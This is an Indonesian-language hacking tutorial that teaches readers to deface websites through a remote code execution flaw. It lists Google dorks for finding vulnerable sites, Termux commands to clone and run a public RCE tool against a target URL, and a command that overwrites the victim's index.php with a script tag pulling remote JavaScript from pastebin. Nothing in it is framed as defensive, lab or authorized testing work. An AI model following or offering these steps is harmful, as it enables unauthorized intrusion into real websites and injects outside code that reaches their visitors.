DEFACE POC RCE

Sesuai Judul, Yaitu Deface POC RCE (Remote Code  Execution)

BTW, ini merpakan method lama gan, tapi barusan gw dorking dengan cara ini ternyata masih banyak yang masih vuln, dan saya pun langsung membuat tutornya hehe.

Yapp daripada lama-lama mendingan kita langsug saja ke tutorialnya.

Siapin Alat-Alatnya !!
1. Dork
2. Termux


Dork?
 ~ inurl:/brandUrl=http://
 ~ inurl:/signin.php?ret=http
 ~ +"Public" +"My Conferences" +"Personal Library" +"My Profile" +19.49.5200.0


Oke langsung ke tahap selajutnya.
Dorking Ke GOOGLE



Kalo udah sekarang buka aplikasi termuxnya.
dan ketikan Command:

$ pkg update && upgrade
$ pkg install python
$ pkg install wget
$ pkg install bash
$ git clone https://github.com/GarudaTersakti72/RCE
$ ls
$ cd RCE
$ sh install.sh


Jika sudah.
Ketik : python Rce.py http://sitetarget.com
dan enter, dan akan terlihat webnya vuln/tidak

seperti ini kalau vuln

Jika sudah tinggal kita tebas index deh.
caranya? kita akan menggunakan script JSO, (klik di sini untuk membuat script JSO)
Selanjutnya? Ketik di termux
$ echo "script jsonya" > ../index.php

example:
$ echo '<script type="text/javascript" src="https://pastebin.com/raw/V6mYej58"></script>'  > ../index.php
Kalo masih ga tau liat nih fotonya :

Jika ada tulisan "No Output" maka kemungkinan scriptnya sudah terkirim.

dan tertebas indexnya XD

Ssekian Tutorial dari saya, Terimakasih : )